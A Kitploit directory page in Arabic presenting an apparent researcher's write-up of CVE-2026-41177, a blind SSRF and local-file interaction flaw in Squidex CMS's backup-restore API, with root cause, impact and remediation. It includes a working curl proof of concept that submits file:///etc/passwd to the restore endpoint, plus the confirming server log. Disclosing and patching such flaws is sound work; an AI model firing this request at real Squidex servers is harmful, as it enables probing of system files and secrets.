Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41177-Squidex-CMS — # CVE-2026-41177، ثغرة SSRF عمياء في Squidex CMS (قبل الإصدار v7.23.0). تتضمن تحليل السبب الجذري، خطوات إعادة الإنتاج، وتقييم الأثر المتعلق بتفاعل الملفات المحلية (LFI). | Kitploit
أدوات/GitHubGitHub/turkios/cve-2026-41177-squidex-cms
تحليل الثغرات الأمنيةالاستغلالأمن الويبالتعلم والتعليم
GitHubturkios/cve-2026-41177-squidex-cms

CVE-2026-41177-Squidex-CMS

# CVE-2026-41177، ثغرة SSRF عمياء في Squidex CMS (قبل الإصدار v7.23.0). تتضمن تحليل السبب الجذري، خطوات إعادة الإنتاج، وتقييم الأثر المتعلق بتفاعل الملفات المحلية (LFI).

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41177: Squidex CMS ثغرة SSRF العمياء

بحث وتحليل تقني لثغرة CVE-2026-41177: ثغرة تزوير الطلبات من جانب الخادم (SSRF) العمياء في واجهة استعادة النسخ الاحتياطي في Squidex CMS.

نظرة عامة على الثغرة

  • معرف CVE: CVE-2026-41177
  • المكوّن المتأثر: واجهة Squidex API: محرك النسخ الاحتياطي / الاستعادة (/api/apps/restore)
  • الإصدارات المتأثرة: < 7.23.0
  • نوع الثغرة: SSRF عمياء (CWE-918)، تفاعل مع الملفات المحلية (CWE-73)

ملخص

واجهة استعادة النسخ الاحتياطي في Squidex معرّضة لثغرة تزوير الطلبات من جانب الخادم (SSRF) العمياء. يفشل التطبيق في التحقق من مخطط URI لمعامل Url المقدَّم من المستخدم، مما يسمح باستخدام بروتوكول file://. يتيح ذلك لمسؤول مصادَق إجبار الخادم الخلفي على التفاعل مع نظام الملفات المحلي، مما يؤدي إلى تفاعل مع الملفات المحلية (LFI) واحتمال كشف معلومات حساسة عن النظام من خلال تحليل القنوات الجانبية للسجلات الداخلية.

التفاصيل

  1. الإعداد: يقوم المهاجم بإنشاء مهمة "استعادة" باستخدام URI لنظام الملفات المحلي (مثل ).
file:///etc/passwd
  • التحفيز: يرسل المهاجم طلب POST إلى نقطة نهاية الاستعادة.
  • التنفيذ: يقبل الخادم الخلفي الطلب ويمرر عنوان URL إلى عامل في الخلفية (RestoreJob).
  • الملاحظة: بينما تكون استجابة API عامة بصيغة 204 No Content، تكشف سجلات الخادم الداخلية أن الخادم نجح في فتح الملف وقراءته قبل الفشل لأن المحتوى لم يكن أرشيف ZIP صالحًا.
  • إثبات المفهوم (PoC)

    1. الطلب الخبيث

    نفّذ أمر curl التالي (استبدل <TOKEN> برمز مسؤول صالح):

    root@kitploit:~
    curl -X POST http://localhost/api/apps/restore/ \
      -H 'Authorization: Bearer <TOKEN>' \
      -H 'Content-Type: application/json' \
      -d '{
        "Url": "file:///etc/passwd",
        "Name": "exploit-poc"
      }' -v
    

    2. التحقق عبر السجلات

    يؤكد الخطأ التالي في سجلات حاوية Squidex التفاعل الداخلي مع الملف:

    root@kitploit:~
    {
      "logLevel": "Error",
      "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
      "exception": {
        "type": "System.IO.InvalidDataException",
        "message": "End of Central Directory record could not be found.",
        "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
      }
    }
    

    ملاحظة: يؤكد InvalidDataException أن الخادم نجح في الوصول إلى بايتات الملف وقراءتها.

    التأثير

    تسمح هذه الثغرة للمهاجمين المصادَقين بـ:

    • استطلاع نظام الملفات: تأكيد وجود ملفات حساسة (مثل appsettings.json، الأسرار).
    • كشف المعلومات: في البيئات متعددة المستأجرين، يمكن استخدام هذا للوصول إلى ملفات النسخ الاحتياطي للمستخدمين الآخرين.

    المعالجة

    • التحديث: قم بالترقية إلى إصدار Squidex 7.23.0 أو أحدث.
    • القائمة البيضاء للبروتوكولات: اسمح فقط بمخططي http:// و https:// بشكل صارم.
    • التحقق من المدخلات: نفّذ فحصًا لرفض أي URI يستخدم مخطط file:// قبل المعالجة.
    • معالجة الإدخال/الإخراج الآمنة: تأكد من تقييد المعالجات الأساسية من حل نظام الملفات المحلي للمدخلات المقدَّمة من المستخدم.

    المراجع

    • GitHub Security Advisory (GHSA-45fq-w37p-qfw5)
    • Official CVE Record
    تنزيل الأداة